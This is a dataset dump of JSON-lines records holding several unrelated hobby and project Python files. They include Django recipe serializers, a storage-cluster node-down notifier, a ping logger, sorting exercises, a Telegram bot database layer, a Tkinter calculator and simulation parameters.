context)\n","repo_name":"spectralDNS/spectralDNS","sub_path":"demo/LaminarChannel.py","file_name":"LaminarChannel.py","file_ext":"py","file_size_in_byte":4571,"program_lang":"python","lang":"en","doc_type":"code","stars":271,"dataset":"github-code","pt":"32"} +{"seq_id":"42479052305","text":"from django.core.exceptions import ValidationError\nfrom django.db.models import F\nfrom django.shortcuts import get_object_or_404\nfrom drf_extra_fields.fields import Base64ImageField\nfrom rest_framework import serializers\n\nfrom recipes.models import (Cart, Favorite, Ingredient, Recipe,\n RecipeIngredient, Tag)\nfrom users.serializers import FoodgramUserListSerializer\n\n\nclass IngredientSerializer(serializers.ModelSerializer):\n\n class Meta:\n fields = '__all__'\n model = Ingredient\n\n\nclass TagSerializer(serializers.ModelSerializer):\n\n class Meta:\n fields = '__all__'\n model = Tag\n\n\nclass RecipeSerializer(serializers.ModelSerializer):\n tags = TagSerializer(many=True, read_only=True)\n author = FoodgramUserListSerializer(read_only=True)\n ingredients = serializers.SerializerMethodField()\n is_favorited = serializers.SerializerMethodField()\n is_in_shopping_cart = serializers.SerializerMethodField()\n image = Base64ImageField()\n\n class Meta:\n model = Recipe\n fields = (\n 'id',\n 'tags',\n 'author',\n 'ingredients',\n 'is_favorited',\n 'is_in_shopping_cart',\n 'name',\n 'image',\n 'text',\n 'cooking_time',\n )\n read_only_fields = (\n 'is_favorite',\n 'is_shopping_cart',\n )\n\n def get_ingredients(self, recipe):\n ingredients = recipe.ingredients.values(\n 'id', 'name', 'measurement_unit', amount=F('recipe__amount')\n )\n return ingredients\n\n def get_is_favorited(self, recipe):\n user = self.context.get('view').request.user\n if user.is_anonymous:\n return False\n return user.favorite.filter(recipe=recipe).exists()\n\n def get_is_in_shopping_cart(self, recipe):\n user = self.context.get('view').request.user\n if user.is_anonymous:\n return False\n return user.cart.filter(recipe=recipe).exists()\n\n def validate(self, data):\n tags_list = self.initial_data.get('tags')\n ingredients = self.initial_data.get('ingredients')\n if not tags_list or not ingredients:\n raise ValidationError('Где теги? 
Где ингредиенты?')\n exists_tags = Tag.objects.filter(id__in=tags_list)\n if len(exists_tags) != len(tags_list):\n raise ValidationError('Есть несуществующий тег')\n ingredient_dict = {}\n if not ingredients:\n raise serializers.ValidationError(\n 'Минимально должен быть 1 ингредиент'\n )\n for item in ingredients:\n ingredient = get_object_or_404(\n Ingredient, id=item['id']\n )\n if ingredient.pk in ingredient_dict:\n raise serializers.ValidationError(\n 'Ингредиент не должен повторяться'\n )\n if int(item.get('amount')) < 1:\n raise serializers.ValidationError(\n 'Минимальное количество ингредиента = 1'\n )\n ingredient_dict[ingredient.pk] = (ingredient, item.get('amount'))\n data.update({\n 'tags': tags_list,\n 'ingredients': ingredient_dict,\n 'author': self.context.get('request').user\n })\n return data\n\n def create(self, validated_data):\n tags = validated_data.pop('tags')\n ingredients = validated_data.pop('ingredients')\n recipe = Recipe.objects.create(**validated_data)\n recipe.tags.set(tags)\n self.extension(recipe, ingredients)\n return recipe\n\n def update(self, recipe, validated_data):\n tags = validated_data.pop('tags')\n ingredients = validated_data.pop('ingredients')\n if tags:\n recipe.tags.clear()\n recipe.tags.set(tags)\n if ingredients:\n recipe.ingredients.clear()\n self.extension(recipe, ingredients)\n return super().update(recipe, validated_data)\n\n def extension(self, recipe, ingredients):\n objs = []\n for ingredient, amount in ingredients.values():\n objs.append(RecipeIngredient(\n recipe=recipe,\n ingredients=ingredient,\n amount=amount\n ))\n RecipeIngredient.objects.bulk_create(objs)\n\n\nclass FavoriteSerializer(serializers.ModelSerializer):\n\n class Meta:\n fields = '__all__'\n model = Favorite\n\n def validate(self, obj):\n user = self.context['request'].user\n recipe = obj['recipe']\n favorite = user.favorite.filter(recipe=recipe).exists()\n\n if self.context.get('request').method == 'POST' and favorite:\n raise serializers.ValidationError(\n 'Этот рецепт уже добавлен в избранное'\n )\n if self.context.get('request').method == 'DELETE' and not favorite:\n raise serializers.ValidationError(\n 'Этот рецепт отсутствует в избранном'\n )\n return obj\n\n\nclass CartSerializer(serializers.ModelSerializer):\n\n class Meta:\n fields = '__all__'\n model = Cart\n\n def validate(self, obj):\n user = self.context['request'].user\n recipe = obj['recipe']\n cart = user.cart.filter(recipe=recipe).exists()\n\n if self.context.get('request').method == 'POST' and cart:\n raise serializers.ValidationError(\n 'Этот рецепт уже добавлен в корзину'\n )\n if self.context.get('request').method == 'DELETE' and not cart:\n raise serializers.ValidationError(\n 'Этот рецепт отсутствует в корзине'\n )\n return obj\n","repo_name":"ABCTPu9IHOB/foodgram-project-react","sub_path":"backend/recipes/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":5982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32451219276","text":"from PetaSAN.core.common.enums import NodeStatus\nfrom PetaSAN.core.common.log import logger\nfrom PetaSAN.core.consul.api import ConsulAPI\nfrom PetaSAN.core.notification.base import CheckBasePlugin,NotifyContext, Result\nfrom PetaSAN.core.common.messages import gettext\n\nclass NodeDownPlugin(CheckBasePlugin):\n def __init__(self,context):\n self.__context = context\n\n\n def is_enable(self):\n return True\n\n\n def run(self):\n self.__notify_list()\n\n def 
get_plugin_name(self):\n return self.__class__.__name__\n\n\n\n def __get_down_node_list(self):\n down_node_list = []\n try:\n con_api = ConsulAPI()\n node_list = con_api.get_node_list()\n consul_members = con_api.get_consul_members()\n for i in node_list:\n if i.name not in consul_members:\n i.status = NodeStatus.down\n down_node_list.append(i.name)\n return down_node_list\n except Exception as e:\n logger.exception(\"error get down node list\")\n return down_node_list\n\n def __notify_list(self):\n try:\n result = Result()\n old_node_list = self.__context.state.get(self.get_plugin_name(),[])\n down_node_list = self.__get_down_node_list()\n for node in down_node_list:\n if node not in old_node_list:\n result.message= '\\n'.join(gettext(\"core_message_notify_down_node_list\").split(\"\\\\n\")).format(''.join('\\n- node:{} '.format(node) for node in down_node_list))\n #logger.warning(result.message)\n result.plugin_name=str(self.get_plugin_name())\n result.title = gettext(\"core_message_notify_down_node_list_title\")\n self.__context.results.append(result)\n break\n self.__context.state[self.get_plugin_name()]= down_node_list\n except Exception as e:\n logger.exception(\"error notify down node list\")\n","repo_name":"robertoberto/petasan","sub_path":"storage-appliance/usr/lib/python2.7/dist-packages/PetaSAN/core/notification/plugins/check/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"8767937419","text":"import pickle\nfrom sklearn.linear_model import Ridge\nimport numpy as np\n\nf = open('data.pkl','rb')\ndata = pickle.load(f)\nf.close()\nwith open('test.csv', 'r') as f:\n test = []\n csv_data = f.read().split('\\n')\n for row in csv_data[1:]:\n if len(row) == 0:\n break\n row = row.split(',')\n test.append((row[1],row[2]))\nresult = []\nfor shop_id in range(60):\n x,y = [],[]\n print('shop_id:%d'%(shop_id))\n for month_id in range(34):\n tmpx,tmpy = [],[]\n month = int(month_id%12)\n year = int(month_id//12)\n for item_id in range(22170):\n price = (np.sum(data[shop_id][month_id][item_id]['price']) / 30)/1000\n cnt = np.sum(data[shop_id][month_id][item_id]['cnt_day']) / 30\n tmpx.extend([year, month, price])\n tmpy.append(cnt)\n x.append(tmpx)\n y.append(tmpy)\n x = np.array(x)\n y = np.array(y)\n clf = Ridge(alpha=1.0).fit(x[:-1],y[:-1])\n # create pred\n test_x = []\n month_id = 34\n for item_id in range(22170):\n price = (np.sum(data[shop_id][month_id - 1][item_id]['price']) / 30)/1000\n test_x.extend([year, month, price])\n pred = clf.predict(np.array([test_x]))\n result.append(pred[0])\n\nwith open('result.csv', 'w') as f:\n idx = 0\n f.write('ID,item_cnt_month\\n')\n for shop_id,item_id in test:\n f.write('%d,%f\\n'%(idx,result[int(shop_id)][int(item_id)]))\n idx += 1\n\n \n \n\n\n\n \n\n\n\n\n","repo_name":"ben85824/DSAI-Midterm-Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6241892919","text":"\"\"\"\na program that accepts sequence of lines as input and prints the lines \nafter making all characters in the sentence capitalised. 
\n\n\"\"\"\n\ndef Upper_case():\n\tstring = input(\"enter sentence:\")\n\tif type(string) is str:\n\t\treturn string.upper()\n\telse:\n\t\tprint('invalid input: please enter a string')\n\t\treturn print(Upper_case())\n\n\n\nprint(Upper_case())","repo_name":"kalungiconrad/py-practice","sub_path":"upper_case.py","file_name":"upper_case.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10016759075","text":"\"\"\"\n1. Отсортируйте по убыванию методом пузырька одномерный целочисленный массив,\nзаданный случайными числами на промежутке [-100; 100). ��ыведите на экран исходный и отсортированный массивы.\nПримечания:\na. алгоритм сортировки должен быть в виде функции, которая принимает на вход массив данных,\nb. постарайтесь сделать алгоритм умнее, но помните, что у вас должна остаться сортировка пузырьком.\nУлучшенные версии сортировки, например, расчёской, шейкерная и другие в зачёт не идут.\n\nbubble_desc - метод пузырька без улучшений\nbubble_desc_adv - метод пузырька с улучшением - если во внутреннем цикле не произошло ни одного обмена,\nзначит массив отсортирован, можно завершить внешний цикл.\nРезультаты замеров времени для обоих видов сортировки, улучшенный метод быстрее где-то на 5%:\npython -m timeit -n 100 -s \"import les_7_task_1\" \"les_7_task_1.bubble_desc()\"\n100 loops, best of 5: 80.5 msec per loop\npython -m timeit -n 100 -s \"import les_7_task_1\" \"les_7_task_1.bubble_desc_adv()\"\n100 loops, best of 5: 76.4 msec per loop\n\"\"\"\nimport random\nimport copy\n\n\ndef bubble_desc(arr):\n n = 1\n while n < len(arr):\n k = 0\n for i in range(len(arr) - n):\n if arr[i] < arr[i + 1]:\n arr[i], arr[i + 1] = arr[i + 1], arr[i]\n k += 1\n n += 1\n return arr\n\n\ndef bubble_desc_adv(arr):\n n = 1\n end_idx = len(arr)\n while n < end_idx:\n k = False\n for i in range(end_idx - n):\n if arr[i] < arr[i + 1]:\n arr[i], arr[i + 1] = arr[i + 1], arr[i]\n k = True\n if not k:\n break\n n += 1\n return arr\n\n\nlst = [random.randint(-100, 99) for _ in range(20)]\n\nprint(f'Начальный массив: {lst}')\nlst_1 = bubble_desc(copy.deepcopy(lst))\nprint(f'Отсортированный массив: {lst_1}')\nlst_2 = bubble_desc_adv(copy.deepcopy(lst))\nprint(f'Отсортированный массив улучшенный: {lst_2}')\nprint(f'Равны ли отсортированные массивы: {lst_1 == lst_2}')\n","repo_name":"damkh/gb_py_alg_2020-07","sub_path":"les_7/les_7_task_1.py","file_name":"les_7_task_1.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19167845865","text":"# --- IMPORTS ---\nimport subprocess\nimport time\n# ---------------\n\nclass Pinger:\n def __init__(self, messages=False, os=\"WINDOWS\") -> None:\n \"\"\"Initializes Pinger class,\\n\n Non-input Attributes:\n cmd (array): subprocess library, array of commands. Currently windows ping command.\\n\n results (None): Stores ping results, initializes as None\\n\n\n Args:\n messages (bool, optional): Show all ping results?. Defaults to False.\n os (str, optional): \"WINDOWS\" or \"MACOS\". Changes ping command. Defaults to \"WINDOWS\".\n \"\"\"\n self.os = os\n\n self.cmd = ['ping', '-n', '1','8.8.8.8']\n\n self.results = None\n self.messages = messages\n print(\"Press 'Control+C' to quit! 
Otherwise, this will continuously run!\\n .run() to run test, see README for other commands\")\n\n # --- Getters, Setters ---\n def getCMD(self):\n return self.cmd\n\n def setCMD(self, cmd):\n self.cmd = cmd\n\n def getOS(self):\n return self.os\n\n def setOS(self, os):\n self.os = os\n if self.os == \"WINDOWS\":\n self.cmd = ['ping', '-n', '1','8.8.8.8']\n elif self.os == \"MACOS\":\n self.cmd = ['ping', '-c', '1', '8.8.8.8']\n else:\n print(\"Unsupported OS, Defaulting to WINDOWS\")\n self.os = \"WINDOWS\"\n self.cmd = ['ping', '-n', '1','8.8.8.8']\n\n def getMessages(self):\n return self.messages\n\n def setMessages(self, messages):\n self.messages = messages\n # ------------------------\n\n # --- Results/Logic ---\n def getAllResults(self):\n if self.messages == True:\n print(\"All results: \\n%s\\n\" % (self.results))\n return self.results\n\n def getBadResults(self):\n shouldLog = False\n\n if \"bytes\" not in self.results:\n _time = time.ctime()\n print(\"Timestamp: \\n%s\\nMessage: %s\" % (_time, self.results))\n shouldLog = True\n\n if shouldLog == True:\n with open(\"LOGGER.txt\", \"a\") as myfile:\n myfile.write(_time)\n myfile.write(self.results)\n myfile.write(\"__________________________\\n\")\n\n def logger(self): \n try:\n self.results = (\"\".join(map(chr, subprocess.check_output(self.cmd, stderr=subprocess.STDOUT))))\n except subprocess.CalledProcessError as e:\n self.results = (\"DOWN %s\" % (time.ctime()))\n with open(\"LOGGER.txt\", \"a\") as myfile:\n myfile.write(self.results)\n myfile.write(\"__________________________\\n\")\n time.sleep(1)\n self.logger()\n return self.results\n\n def run(self):\n try:\n while True:\n self.logger()\n self.getAllResults()\n self.getBadResults()\n time.sleep(1)\n except KeyboardInterrupt:\n pass\n\n # --------------------","repo_name":"seanpden/pingerTool","sub_path":"pinger.py","file_name":"pinger.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72557718490","text":"import pyautogui\nimport math\nfrom constants import CELL_SIZE, CURRENCY_TAB, WIDTH, HEIGHT, TRADE_WINDOW, PYAUTOGUI_SPEED, TRADE_VERIFY_RETRIES\nfrom stash.empty_equipment import empty_equipment\nfrom trade.TradeException import TradeException\nfrom trade.accept_trade import accept_trade\nfrom trade.trade_waits import wait_for_window\nfrom utils.chat_utils import trade_user\nfrom utils.resetCursor import reset_cursor\nfrom utils.prefix_print import printtime\nimport pyperclip\nimport re\nimport time\n\n\ndef trade_currency_for_currency(trade_order, n=0):\n if n == 2:\n return\n sell_currency_config = CURRENCY_TAB[trade_order.sell_currency]\n sell_cells = math.ceil(trade_order.sell_amount / sell_currency_config['stackSize'])\n trade_user(trade_order.buyer)\n trade_started = wait_for_window()\n if trade_started:\n # Double Checking the tradeWindow to prevent errors\n if pyautogui.locate('images/tradeWindow.png', pyautogui.screenshot(region=(296, 496, 664, 362))):\n empty_equipment(sell_cells)\n reset_cursor()\n\n TRADE_VERIFIED_TIMES = 0 # Have Problem Moving this into constants.py\n\n try:\n while TRADE_VERIFIED_TIMES < TRADE_VERIFY_RETRIES:\n pyautogui.PAUSE = 0.001\n\n total_amount = 0\n BROWSE_ITEM = True\n VERIFY_ITEM = False\n\n time.sleep(5)\n\n if TRADE_VERIFIED_TIMES > 1:\n if pyautogui.locate('images/acceptTradeItems.png', pyautogui.screenshot(region=(486, 824, 282, 25))):\n BROWSE_ITEM = True\n else:\n BROWSE_ITEM = False\n\n while BROWSE_ITEM:\n if 
pyautogui.locate('images/acceptTradeItems.png', pyautogui.screenshot(region=(486, 824, 282, 25))):\n for col in range(WIDTH):\n for row in range(HEIGHT):\n pyautogui.moveTo(TRADE_WINDOW['start']['x']+col*TRADE_WINDOW[CELL_SIZE],\n TRADE_WINDOW['start']['y']+row*TRADE_WINDOW[CELL_SIZE])\n VERIFY_ITEM = True\n elif not pyautogui.locate('images/acceptTradeItems.png', pyautogui.screenshot(region=(486, 824, 282, 25))):\n BROWSE_ITEM = False\n\n if VERIFY_ITEM:\n for col in range(WIDTH):\n for row in range(HEIGHT):\n try:\n pyautogui.moveTo(TRADE_WINDOW['start']['x']+col*TRADE_WINDOW[CELL_SIZE],\n TRADE_WINDOW['start']['y']+row*TRADE_WINDOW[CELL_SIZE])\n pyautogui.keyDown('CTRL')\n pyautogui.press('C')\n pyautogui.keyUp('CTRL')\n clipboard_data = pyperclip.paste().replace('\\r', '').replace('\\n', ' - ')\n currency_data = re.match(\n '.+Rarity: \\w+ - (.+) - -+ - Stack Size: (\\d+).+', clipboard_data)\n cell_currency = currency_data.group(1)\n cell_amount = int(currency_data.group(2))\n pyperclip.copy('')\n if cell_currency != trade_order.buy_currency:\n raise TradeException('Wrong currency')\n total_amount += cell_amount\n\n if total_amount == trade_order.buy_amount:\n break\n except Exception as e:\n pass\n\n if total_amount == trade_order.buy_amount:\n break\n if total_amount == trade_order.buy_amount:\n break\n\n TRADE_VERIFIED_TIMES += 1\n\n if TRADE_VERIFIED_TIMES == TRADE_VERIFY_RETRIES:\n printtime(f\"Trading with {trade_order.buyer} failed...\")\n pyautogui.press('ESC')\n return\n\n except Exception as e:\n printtime(f\"Trading Error: {e}...\")\n pyautogui.press('ESC')\n pyautogui.PAUSE = PYAUTOGUI_SPEED # set back to default stable value\n return\n\n pyautogui.PAUSE = PYAUTOGUI_SPEED # set back to default value\n trade_order.update_buy_amount(total_amount)\n accept_trade()\n else:\n printtime(\"Trade didn't accpet.. 
retry in 5 seconds\")\n pyautogui.sleep(5)\n trade_currency_for_currency(trade_order, n + 1)\n","repo_name":"FrozenTear7/poe-trading-bot","sub_path":"trade/trade_currency_for_currency.py","file_name":"trade_currency_for_currency.py","file_ext":"py","file_size_in_byte":4968,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"32"} +{"seq_id":"22216963550","text":"import math\nfrom tkinter import * \n\n#change\n\nroot = Tk()\nroot.title(\"Simple Calculator\")\n\ne = Entry(root, width = 35, borderwidth = 5)\ne.grid(row = 0, column = 0, columnspan = 3, padx = 10, pady = 10)\n# e.insert(0, \"Enter Your Name:\")\n\n\ndef button_click(number):\n current = e.get()\n e.delete(0, END)\n e.insert(0, str(current) + str(number))\n return\n\ndef button_clear():\n e.delete(0, END)\n\ndef button_add():\n first_number = e.get()\n global f_num\n global math \n math = \"addition\"\n f_num = int(first_number)\n e.delete(0, END)\n return\n\ndef button_equal():\n second_number = e.get()\n e.delete(0, END)\n if math == \"addition\":\n e.insert(0, f_num + int(second_number))\n if math == \"subtration\":\n e.insert(0, f_num - int(second_number))\n if math == \"multiplication\":\n e.insert(0, f_num * int(second_number))\n if math == \"division\":\n e.insert(0, f_num / int(second_number))\n if math == \"power\":\n e.insert(0, f_num**int(second_number))\n return\n\ndef button_sub():\n first_number = e.get()\n global f_num\n global math \n math = \"subtraction\"\n f_num = int(first_number)\n e.delete(0, END)\n return\n\ndef button_mul():\n first_number = e.get()\n global f_num\n global math \n math = \"multiplication\"\n f_num = int(first_number)\n e.delete(0, END)\n return\n\ndef button_div():\n first_number = e.get()\n global f_num\n global math \n math = \"division\"\n f_num = int(first_number)\n e.delete(0, END)\n return\n\ndef button_power():\n first_number = e.get()\n global f_num\n global math \n math = \"power\"\n f_num = int(first_number)\n e.delete(0, END)\n return\n\ndef button_sqrt():\n first_number = e.get()\n e.delete(0, END)\n e.insert(0, int(first_number)**0.5)\n return\n\ndef button_factorial():\n first_number = e.get()\n e.delete(0, END)\n factorial = 1\n if int(first_number) == 0:\n e.insert(0, factorial)\n else:\n for i in range(1,int(first_number) + 1):\n factorial = factorial*i\n e.insert(0, factorial)\n return\n\n\nbutton_1 = Button(root, text = \"1\", padx = 40, pady = 20, command = lambda: button_click(1)).grid(row = 3, column = 0)\nbutton_2 = Button(root, text = \"2\", padx = 40, pady = 20, command = lambda: button_click(2)).grid(row = 3, column = 1)\nbutton_3 = Button(root, text = \"3\", padx = 40, pady = 20, command = lambda: button_click(3)).grid(row = 3, column = 2)\nbutton_4 = Button(root, text = \"4\", padx = 40, pady = 20, command = lambda: button_click(4)).grid(row = 2, column = 0)\nbutton_5 = Button(root, text = \"5\", padx = 40, pady = 20, command = lambda: button_click(5)).grid(row = 2, column = 1)\nbutton_6 = Button(root, text = \"6\", padx = 40, pady = 20, command = lambda: button_click(6)).grid(row = 2, column = 2)\nbutton_7 = Button(root, text = \"7\", padx = 40, pady = 20, command = lambda: button_click(7)).grid(row = 1, column = 0)\nbutton_8 = Button(root, text = \"8\", padx = 40, pady = 20, command = lambda: button_click(8)).grid(row = 1, column = 1)\nbutton_9 = Button(root, text = \"9\", padx = 40, pady = 20, command = lambda: button_click(9)).grid(row = 1, column = 2)\nbutton_0 = Button(root, text = \"0\", padx = 40, pady = 20, 
command = lambda: button_click(0)).grid(row = 4, column = 1)\n\nadd_button = Button(root, text = \"+\", bg = \"grey\", fg = \"white\", padx = 40, pady = 20, command = button_add).grid(row = 1, column = 3)\nsub_button = Button(root, text = \"-\", bg = \"grey\", fg = \"white\", padx = 40, pady = 20, command = button_sub).grid(row = 2, column = 3)\nmul_button = Button(root, text = \"*\", bg = \"grey\", fg = \"white\", padx = 40, pady = 20, command = button_mul).grid(row = 3, column = 3)\ndiv_button = Button(root, text = \"/\", bg = \"grey\", fg = \"white\", padx = 40, pady = 20, command = button_div).grid(row = 4, column = 3)\npower_button = Button(root, text = \"x^2\", bg = \"grey\", fg = \"white\", padx = 30, pady = 20, command = button_power).grid(row = 4, column = 0)\nsqrt_button = Button(root, text = \"sqrt\", bg = \"grey\", fg = \"white\", padx = 32, pady = 20, command = button_sqrt).grid(row = 4, column = 2)\nfactorial_button = Button(root, text = \"!\", bg = \"grey\", fg = \"white\", padx = 40, pady = 20, command = button_factorial).grid(row = 4, column = 3)\n\nequal_button = Button(root, text = \"=\", bg = \"grey\", fg = \"white\", padx = 94, pady = 20, command = button_equal).grid(row = 2, column = 4, columnspan = 2)\nclear_button = Button(root, text = \"CLEAR\", bg = \"grey\", fg = \"white\", padx = 79, pady = 20, command = button_clear).grid(row = 1, column = 4, columnspan =2)\n\n\n#myButton = Button(root, text = \"Enter Your Name!\", command=myClick)\n#myButton.pack()\n\n\nroot.mainloop()\n\n\n\n","repo_name":"sratslla/Tkinter-Calculator","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":4685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7554685546","text":"from .utils import TestAPI\n\n\nclass TestAsyncPing(TestAPI):\n \"\"\"Test for users.\"\"\"\n\n def test_ping_one(self):\n \"\"\"Test basic ping access.\"\"\"\n token = self.token\n minion = self.minion\n\n url = '/api/v1.0/tasks/ping/{0}'.format(minion)\n\n # ping one minion\n r, s, h = self.post(url, token_auth=token)\n assert s == 202\n url = h['Location']\n\n while True:\n r, s, h = self.get(url, token_auth=token)\n if s != 202:\n break\n assert s == 200\n assert minion in r\n\n # now invalid minion\n minion = 'inminion_dzakdazdaz'\n url = '/api/v1.0/tasks/ping/{0}'.format(minion)\n r, s, h = self.post(url, token_auth=token)\n assert s == 202\n url = h['Location']\n\n while True:\n r, s, h = self.get(url, token_auth=token)\n if s != 202:\n break\n assert s == 400\n","repo_name":"alkivi-sas/nefario-api","sub_path":"tests/test_async_ping.py","file_name":"test_async_ping.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23689504523","text":"from shared.Util import timed\n\n\n@timed\ndef read():\n file_name = f'input.txt'\n with open(file_name) as input_file:\n return list(input_file.read())\n\n\n@timed\ndef part1(parens):\n print(sum(map(lambda x: 1 if x == '(' else -1, parens)))\n\n\n@timed\ndef part2(parens):\n floor = 0\n for i, paren in enumerate(parens):\n floor += 1 if paren == '(' else -1\n if floor == -1:\n print(i + 1)\n break\n\n\nif __name__ == '__main__':\n paren_list = read()\n part1(paren_list)\n 
part2(paren_list)\n","repo_name":"TumuGuskun/aoc","sub_path":"aoc-2015/day1/Day1.py","file_name":"Day1.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26259971584","text":"from sqlalchemy import create_engine, update\nfrom sqlalchemy.orm import Session\n\nfrom database.models import Base, User, Report, Request, Page\n\n\nengine = create_engine(url='postgresql+psycopg2://postgres:1234@localhost/JobsBot', echo=True)\nconn = engine.connect()\n\nBase.metadata.create_all(engine)\n\ndef add_user_to_db(id, user_class, page_class):\n \"\"\"\n Добавляет юзера в бд и устанавливает номер страницы 1\n \"\"\"\n session = Session(bind=engine)\n user = user_class(id=id)\n\n page = page_class(\n current = 1,\n user_id = id\n )\n\n session.add(user)\n session.add(page)\n session.commit()\n\ndef update_current_page(user_id, page_class, page):\n \"\"\"\n Обновляет текущую страницу просмотра прошлых запросов юзера \n \"\"\"\n session = Session(engine)\n current_page = update(page_class).where(page_class.user_id == user_id).values(current = page)\n session.execute(current_page) \n session.commit()\n\ndef is_user_in_db(user_id, user_class):\n \"\"\"\n Проверят наличие юзера в бд\n \"\"\"\n session = Session(bind=engine)\n id = session.query(user_class.id).filter(user_class.id == user_id).first()\n return id == None\n\n\ndef write_request_in_db(data, request_class, user_id, datetime_now):\n \"\"\"\n Записывает запрос поиска работы в бд\n \"\"\"\n session = Session(engine)\n request = request_class(\n id = datetime_now,\n job = data['job'],\n sort = data['sort'],\n page = data['count'],\n user_id = user_id,\n )\n session.add(request)\n session.commit()\n\ndef write_report_in_db(data, report_class, user_id, datetime_now):\n \"\"\"\n Записывает все найденные вакансии запроса в бд\n \"\"\"\n session = Session(engine)\n report = report_class(\n title = data['title'],\n salary = data['salary'],\n description = data['description'],\n link = data['link'],\n request_id = datetime_now,\n user_id = user_id\n )\n session.add(report)\n session.commit()\n\ndef get_current_report_in_db(request_id, report_class, count):\n \"\"\"\n Получает из базы данных текущиую вакансию юзера для добавленияее в закладки\n \"\"\"\n session = Session(engine)\n\n report = session.query(report_class.title,\n report_class.salary,\n report_class.link).filter(report_class.request_id == request_id).limit(count).all()\n \n return report\n\ndef get_request_in_db(user_id, request_class):\n \"\"\"\n Получает все запросы юзера\n \"\"\"\n session = Session(engine)\n requests = session.query(request_class.id).filter(user_id == request_class.user_id).all()\n return requests\n\ndef get_request_job_in_db(user_id, request_class, request_id):\n \"\"\"\n Получает все найденные вакансии по запросу юзера из бд\n \"\"\"\n session = Session(engine)\n info = session.query(request_class.job).filter(user_id == request_class.user_id).filter(request_class.id == request_id).first()\n return info\n\ndef get_current_page_in_db(user_id, page_class):\n \"\"\"\n Получает текущую страницу юзера\n \"\"\"\n session = Session(engine)\n current_page = session.query(page_class.current).filter(user_id == page_class.user_id).first()\n return current_page[0]\n\ndef get_reports_in_db(request_id, report_class):\n \"\"\"\n Получает все вакансии запроса\n \"\"\"\n session = Session(engine)\n reports = session.query(report_class.title, report_class.salary, 
report_class.link).filter(report_class.request_id == request_id).all()\n return reports\n\ndef get_report_id_in_db(link, report_class):\n \"\"\"\n Получает определенную вакансию по идентифицирующей ссылки\n \"\"\"\n session = Session(engine)\n id = session.query(report_class.id).filter(report_class.link == link).first()\n return id\n\ndef update_report_bookmark_status_in_db(link, report_class, status):\n \"\"\"\n Обновляет статус вакансии в закладках\n \"\"\"\n session = Session(engine)\n bm_status = session.query(report_class).filter(report_class.link == link).first()\n bm_status.is_bookmarked = status\n session.commit()\n\ndef get_marks_reports(user_id, report_class):\n \"\"\"\n Получает вакансии которые в закладках\n \"\"\"\n session = Session(engine)\n reports = session.query(report_class.title, report_class.link).filter(report_class.user_id == user_id).filter(report_class.is_bookmarked == True).all()\n return reports\n","repo_name":"IlyaBulatau/TelegramBotSearchJobs","sub_path":"database/orm.py","file_name":"orm.py","file_ext":"py","file_size_in_byte":4862,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13167744374","text":"import numpy as np\n\n\"\"\" path \"\"\"\npath = '../data/result.txt'\n\n\"\"\" spatial parameters \"\"\"\ndr = 300\t\t\t# spatial resolution (300 nm per grid)\nx_real = 8000\ny_real = 8000\nz_real = 5000\nr_real = 2000 # radius (nm) of shpere (i.e. origin of meshgrid)\n\n\"\"\" temporal parameters \"\"\"\ndt = 3e-7\t\t\t# temporal resolution\nt_total = 3\t \t\t# total time\nnsteps = int(t_total / dt)\ngamma = 1\t \t# relaxation coefficient\n\n\"\"\" initial orientaion (azimuthal, elevation) \"\"\"\nn_init = [(45 * np.pi / 180), 0]\n\n\"\"\" nematic material parameters (unit: Jm^-3) \"\"\"\nA = -0.172e6\nB = -2.12e6\nC = 1.73e6\n\n\"\"\" one elastic constant approximation (unit: Jm^-1) \"\"\"\nL = 4e-9\n\n\"\"\" substrate & shell anchoring (unit: Jm^-2) \"\"\"\nW_subs = 1e0\nW_shel = 1e-1\n\n\"\"\" Laplacian spacing \"\"\"\ndr_lap = 1e-7\n\n\"\"\" steps per update (50 result only, 500000 real time monitor) \"\"\"\nplot_rate = int(5e5)\nspu = int(3) # deprecated\n\n\"\"\" dimensions \"\"\"\nx_nog = round(x_real / dr)\t# number of grids on x dimension (nog = 27)\ny_nog = round(y_real / dr)\t# number of grids on y dimension (nog = 27)\nz_nog = round(z_real / dr)\t# number of grids on z dimension (nog = 17)\nr_nog = round(r_real / dr) # radius of shpere (unit: number of grids) (nog = 7)\nmesh_shape = (z_nog, y_nog, x_nog)\n\n\"\"\" mesh \"\"\"\ndx = dy = dz = 1\n\naxis_x = np.arange(-x_nog/2+0.5, x_nog/2+0.5, dx)\t\t# (-13 to 13)\naxis_y = np.arange(-y_nog/2+0.5, y_nog/2+0.5, dy)\t\t# (-13 to 13)\naxis_z = np.arange(-z_nog/2+0.5, z_nog/2+0.5, dz)\t\t# ( -8 to 8)\naxis = (axis_z, axis_y, axis_x)\n\n\"\"\" initial and boundary conditions \"\"\"\nS_subs = 0.9\nS_cent = 0.1\nS_init = 0.5\nn_subs = [1, 0, 0]\nn_shel = [1, 0, 0]\nn_bias = [1, 0, 0]\n\n\"\"\" thresholds \"\"\"\nasym_th = 1e-100\ntrace_th = 